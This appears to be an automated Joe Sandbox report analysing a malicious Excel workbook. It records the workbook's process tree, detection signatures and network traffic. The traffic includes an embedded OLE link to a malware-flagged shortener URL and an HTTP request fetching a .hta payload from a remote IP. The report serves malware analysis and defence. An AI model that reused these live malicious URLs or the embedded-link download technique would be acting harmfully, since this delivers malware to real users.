Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OrderSheet.xla.xlsx

Overview

General Information

Sample name:OrderSheet.xla.xlsx
Analysis ID:1572118
MD5:f11d4f4a1c4b40a38a0d32a65b464853
SHA1:0bf28b871d1169fbbe565cf18b032f55f0479cae
SHA256:57d8d4a52a8ae466a911161272b5416bff18784c91fcf631e193a2cbc4376920
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7404 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • Acrobat.exe (PID: 8144 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 6608 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7240 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2060 --field-trial-handle=1596,i,13638127103217919502,6718479426276192951,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • splwow64.exe (PID: 3720 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • splwow64.exe (PID: 2876 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • splwow64.exe (PID: 6484 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 2672 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\OrderSheet.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.150.207.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7404, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49814
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49814, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7404, Protocol: tcp, SourceIp: 54.150.207.131, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://short.ruksk.com/2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverageAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: OrderSheet.xla.xlsxReversingLabs: Detection: 18%
Source: OrderSheet.xla.xlsxVirustotal: Detection: 11%Perma Link
Machine Learning detection for sample
Source: OrderSheet.xla.xlsxJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.5:49814 version: TLS 1.2

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: global trafficDNS query: name: short.ruksk.com
Source: global trafficDNS query: name: x1.i.lencr.org
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 172.245.123.29:80
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.5:49814
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.5:49814
Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.5:49814
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.5:49814
Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.5:49814
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.5:49814
Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.5:49814
Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.5:49814
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.5:49814
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 172.245.123.29:80
Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 172.245.123.29:80
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 172.245.123.29:80
Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 172.245.123.29:80
Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.5:49820
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 172.245.123.29:80
Source: global trafficTCP traffic: 192.168.2.5:49820 -> 172.245.123.29:80
Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.5:49820
Source: excel.exeMemory has grown: Private usage: 2MB later: 75MB
Source: Joe Sandbox ViewIP Address: 54.150.207.131 54.150.207.131
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverage HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: short.ruksk.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /221/wcc/shewithmegoodthingstogetmebackwithentirelifeiloveherwithheart.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.29
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverage HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: short.ruksk.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /221/wcc/shewithmegoodthingstogetmebackwithentirelifeiloveherwithheart.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.29
Source: global trafficDNS traffic detected: DNS query: short.ruksk.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 05:48:33 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 37 32 2e 32 34 35 2e 31 32 33 2e 32 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 172.245.123.29 Port 80</address></body></html>
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.drString found in binary or memory: http://x1.i.lencr.org/
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownHTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.5:49814 version: TLS 1.2

System Summary

barindex
Excel sheet contains many unusual embedded objects
Source: OrderSheet.xla.xlsxOLE: Microsoft Excel 2007+
Source: OrderSheet.xla.xlsxOLE: Microsoft Excel 2007+
Source: FA440000.0.drOLE: Microsoft Excel 2007+
Source: FA440000.0.drOLE: Microsoft Excel 2007+
Source: OrderSheet.xla.xlsxOLE indicator, VBA macros: true
Source: FA440000.0.drOLE indicator, VBA macros: true
Source: OrderSheet.xla.xlsxStream path 'MBD00016417/\x1Ole' : https://short.ruksk.com/2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverageB^pgnTtYj9obRPn04l0eylXGdmd1ffbGeoszYT3wJO1XUb3Ydl2eT2CuW7ERCfZu4U5TkcZrkeEhgEjSbrSecY4NIzqKrPALF3MX0Ghtg2wAoXhwYjFrHjboV6MNduekwBYXg9nRbeH6qKsqZ9DSAdXfFwJEMikiZVNvwXtQGVPphhVgEgyA9VjN3wAj}#A*RCLZYLSU!*
Source: FA440000.0.drStream path 'MBD00016417/\x1Ole' : https://short.ruksk.com/2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverageB^pgnTtYj9obRPn04l0eylXGdmd1ffbGeoszYT3wJO1XUb3Ydl2eT2CuW7ERCfZu4U5TkcZrkeEhgEjSbrSecY4NIzqKrPALF3MX0Ghtg2wAoXhwYjFrHjboV6MNduekwBYXg9nRbeH6qKsqZ9DSAdXfFwJEMikiZVNvwXtQGVPphhVgEgyA9VjN3wAj}#A*RCLZYLSU!*
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'ordersheet.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal68.expl.winXLSX@22/73@2/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$OrderSheet.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{317C6E6B-A3B7-4AAB-8683-14674C86DB7B} - OProcSessId.datJump to behavior
Source: OrderSheet.xla.xlsxOLE indicator, Workbook stream: true
Source: FA440000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: OrderSheet.xla.xlsxReversingLabs: Detection: 18%
Source: OrderSheet.xla.xlsxVirustotal: Detection: 11%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2060 --field-trial-handle=1596,i,13638127103217919502,6718479426276192951,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\OrderSheet.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2060 --field-trial-handle=1596,i,13638127103217919502,6718479426276192951,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: OrderSheet.xla.xlsxStatic file information: File size 1071616 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: OrderSheet.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
